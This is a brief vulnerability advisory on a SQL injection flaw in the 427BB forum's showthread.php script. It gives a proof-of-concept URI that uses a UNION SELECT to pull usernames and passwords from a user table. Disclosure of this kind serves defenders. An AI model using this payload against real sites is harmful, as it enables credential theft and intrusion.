427BB Showthread.PHP SQL Injection Vulnerability

info
discussion
exploit
solution
references

427BB Showthread.PHP SQL Injection Vulnerability

An exploit is not required.

The following proof of concept URI is available:
http://www.example.com/bb427/showthread.php?ForumID=999%20union%20select%20UserName,Passwrod,null,null%20from%20prefPersonal